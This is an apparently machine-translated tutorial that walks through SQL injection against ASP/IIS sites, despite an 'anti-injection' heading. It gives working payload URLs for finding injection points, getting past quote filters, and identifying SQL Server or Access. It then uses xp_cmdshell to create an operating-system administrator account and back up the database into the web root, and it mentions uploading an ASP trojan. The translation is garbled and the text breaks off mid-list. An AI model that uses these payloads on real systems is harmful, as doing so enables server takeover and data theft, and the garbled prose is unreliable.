Program | anti-injection < a >sql injection profile
Many web-site programs are written without judging the legality of user input data,
Make your application a security risk. Users can submit a section of database query code,
(typically in the browser address bar, accessed through the normal WWW port)
According to the results returned by the program, get some data that he wants to know,
This is called SQL injection, or SQL injection.
< two >sql injection ideas
The most important idea
Actually, a lot of people don't know what SQL can do.
Here's a summary of the general idea of SQL injection intrusion
1. SQL injection vulnerability judgment, that is, to find the injection point
2. Determine the background database type
3. Determination of xp_cmdshell performance; If the account with the current connection data has SA permission,
and Master.dbo.xp_cmdshell extended stored procedures (the shell that calls this stored procedure to use the operating system directly) can execute correctly, the entire computer can be completely
Control, it completes the entire injection process.
Otherwise continue:
1. Discovery Web Virtual Directory
2. Upload ASP Trojan Horse;
3. Get Administrator Privileges
Specific steps
The judgment of SQL injection Vulnerability
If you've never been injected before,
Please take the IE menu-tool-internet Option-advanced-Show friendly HTTP error messages in front of the check to remove.
In order to clarify the problem, the following is HTTP://www.163.com/news.asp?id=xx (this address is hypothetical)
For example, XX may be an integral type, or it may be a string.
1, the judgment of the parameter of the whole type
When the input parameter xx is an integral type, the SQL statement typically looks like this in news.asp:
SELECT * from table name where field =xx, so you can test the existence of SQL injection with the following steps.
The simplest way to judge
HTTP://www.163.com/news.asp?id=xx ' (append a single quote),
At this point the SQL statement in news.asp becomes a
SELECT * from table name where Field =xx ',
If the program does not filter the "'" Words
Will prompt news.asp to run abnormally;
But such a method, though simple, is not the best.
Because
One, not necessarily every server's IIS returns a specific error prompt to the client,
SQL injection is not successful if you add a statement such as CInt (parameters) to the program.
However, the server will also complain, the specific message to deal with the URL when the server error.
Please contact your system administrator.
Second, most programmers are now filtering out "'", So "'" is not used to test the injection point
So the classic 1=1 and 1=2 test methods are commonly used
See below:
HTTP://www.163.com/news.asp?id=xx and 1=1, news.asp run normally,
And the result is the same as that of the HTTP://www.163.com/news.asp?id=xx operation;
HTTP://www.163.com/news.asp?id=xx and 1=2, news.asp run abnormally; (this is the classic 1=1 1=2 judgment method)
If it is satisfied with the above, there will be a SQL injection vulnerability in news.asp, which may not be injected.
2, the judgement of the string type parameter
The method is basically the same as that of the numerical parameter estimation method
When the input parameter xx is a string, the SQL statement typically looks like this in news.asp:
SELECT * from table name where field = ' xx ', you can use the following procedure to test whether the SQL injection exists.
HTTP://www.163.com/news.asp?id=xx ' (append a single quote), at which point the SQL statement in news.asp becomes a
SELECT * from table name where Field =xx ', news.asp run exception;
HTTP://www.163.com/news.asp?id=xx and ' 1 ' = ' 1 ', news.asp running normally,
And the result is the same as that of the HTTP://www.163.com/news.asp?id=xx operation;
HTTP://www.163.com/news.asp?id=xx and ' 1 ' = ' 2 ', news.asp run abnormally;
If the above is satisfied, then there is a SQL injection vulnerability in the news.asp, and the reverse is not injected
3, special circumstances of the treatment
Sometimes ASP programmers filter out single quotes and other characters in the programmer to prevent SQL injection. You can try this at this point in several ways.
① size Blending method: Because VBS is not case-sensitive, programmers usually filter all uppercase strings or filter lowercase strings all the time, while case-by-case mixes tend to
Be neglected. such as using a select instead of Select,select;
②unicode: In IIS, internationalization is done in the Unicode character set, and we can enter the string into a Unicode string that is entered in IE. such as + =%2b, space =%20, etc.
; UrlEncode information see annex I;
③ascii Code method: You can put the input of some or all of the characters all
<4> In addition to the above methods, there is a simpler way to use off-the-shelf tools
NBSI, like the NB Alliance, is a very good tool, the latest version is 2.2
Second, determine the type of database
There are differences in the functions and injection methods of different databases, so we have to judge the type of database before we inject it. The most commonly used database for ASP is access and
SQL Server, more than 99% Web sites on the web are one of them.
How do you let the program tell you what database it uses? To see:
SQL Server has some system variables that can be retrieved directly from the error message if the servers IIS prompts are not turned off and SQL Server returns an error:
HTTP://www.163.com/news.asp?id=xx;and user>0
This statement is simple, but it contains the essence of SQL Server-specific injection methods, and I myself found this highly efficient method of guessing in an unintentional test. Let me see it.
First, the preceding statement is normal, with emphasis on and user>0, we know that user is a built-in variable of SQL Server whose value is the user name of the current connection, and the type is
nvarchar With a nvarchar value of 0 compared to the number of int, the system will first attempt to convert the value of the nvarchar to an int, of course, the process will certainly go wrong, SQL Server error
Hint: syntax error occurs when converting nvarchar value "abc" to a column with a data type of int, OH, ABC is the value of variable user, so, do not waste Chuihuizhili get the data
The user name of the library. In a future space, you will see a lot of statements in this way. Incidentally, as we all know, SQL Server's user SA is an equivalent adminstrators permission
Role, got the SA permission, almost certainly can get the host administrator. The above method can be very convenient to test whether to log in with the SA, note: if it is
SA login, prompting for an error in the column converting "dbo" to int instead of "sa".
If server IIS does not allow you to return error prompts, how do you determine the database type? We can start with access and SQL Server and the difference, and both access and SQL Server have their own
system tables, such as tables that hold all the objects in the database, access is in the system table [msysobjects], but reading the table in the Web environment prompts "No permissions" and SQL Server is in the table
[sysobjects], read normally in the Web environment.
With the confirmation that you can inject it, use the following statement:
HTTP://www.163.com/news.asp?id=xx and (select COUNT (*) from sysobjects) >0
HTTP://www.163.com/news.asp?id=xx and (select COUNT (*) from msysobjects) >0
If the database is SQL Server, the page of the first URL is roughly the same as the original page HTTP://www.163.com/news.asp?id=xx, and the second URL, because the table is not found
Msysobjects, will prompt error, even if the program has fault-tolerant processing, the page is completely different from the original page.
If the database is using access, then the situation is different, the first Web site is completely different from the original page; the second URL, depending on whether the database settings allow reading of the system table
, is generally not allowed, so and the original URL is completely different. In most cases, you can use the first URL to know the type of database used by the system, and the second URL is only open
Verify when the IIS error prompts are restarted.
Iii. Determination of xp_cmdshell implementation
If the account with the current connection data has SA permission,
and Master.dbo.xp_cmdshell extended stored procedures
(The shell that invokes this stored procedure to use the operating system directly) can execute correctly.
The entire computer can be fully controlled in the following ways, and all subsequent steps can be saved
1, HTTP://www.163.com/news.asp?id=xx and user>;0 News.asp executes an exception but can get the user name of the currently connected database (if the dbo is displayed, the SA is represented).
2, HTTP://www.163.com/news.asp?id=xx and db_name () >0 news.asp the name of the database that executes the exception but can get the current connection.
3, HTTP://www.163.com/news.asp?id=xx;exec Master. xp_cmdshell "NET user aaa Bbb/add"--(master is Sql-server's main data
The semicolon in the name of the library indicates that Sql-server executes the statement before the semicolon, continues executing the statement that follows it, and the "-" is the annotation, which means that all the content behind it is only a comment, and the system
Not executed) can directly increase the operating system account AAA, the password is BBB.
4, HTTP://www.163.com/news.asp?id=xx;exec Master. xp_cmdshell "net localgroup Administrators Aaa/add"--add just
Account AAA is added to the Administrators group.
5, HTTP://WWW.163.COM/NEWS.ASP?ID=XX;BACKUUP database name to disk= ' C:\inetpub\wwwroot\save.db ' will be the data content
All backed up to the web directory,